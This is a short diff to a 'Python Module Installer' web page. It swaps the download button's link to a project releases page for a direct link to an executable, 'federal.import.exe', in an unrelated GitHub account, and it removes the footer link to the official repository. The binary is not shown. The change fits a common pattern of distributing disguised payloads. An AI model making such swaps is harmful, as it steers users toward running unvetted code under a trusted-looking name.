--- a/index.html
+++ b/index.html
@@ -69,12 +69,8 @@
     <section class="download">
         <h2>Download the Script</h2>
         <p>You can download the latest version of the Python Module Installer from the link below:</p>
-        <a href="https://github.com/your-username/python-module-installer/releases/latest" target="_blank" class="download-button">Download Now</a>
+        <a href="https://github.com/KXZZW/federalinstaller/releases/download/federal/federal.import.exe" target="_blank" class="download-button">Download Now</a>
     </section>
-
-    <footer>
-        <p>For more information, visit the official GitHub repository:</p>
-        <a href="https://github.com/your-username/python-module-installer" target="_blank" class="github-link">GitHub Repository</a>
-    </footer>
+    
 </body>
 </html>
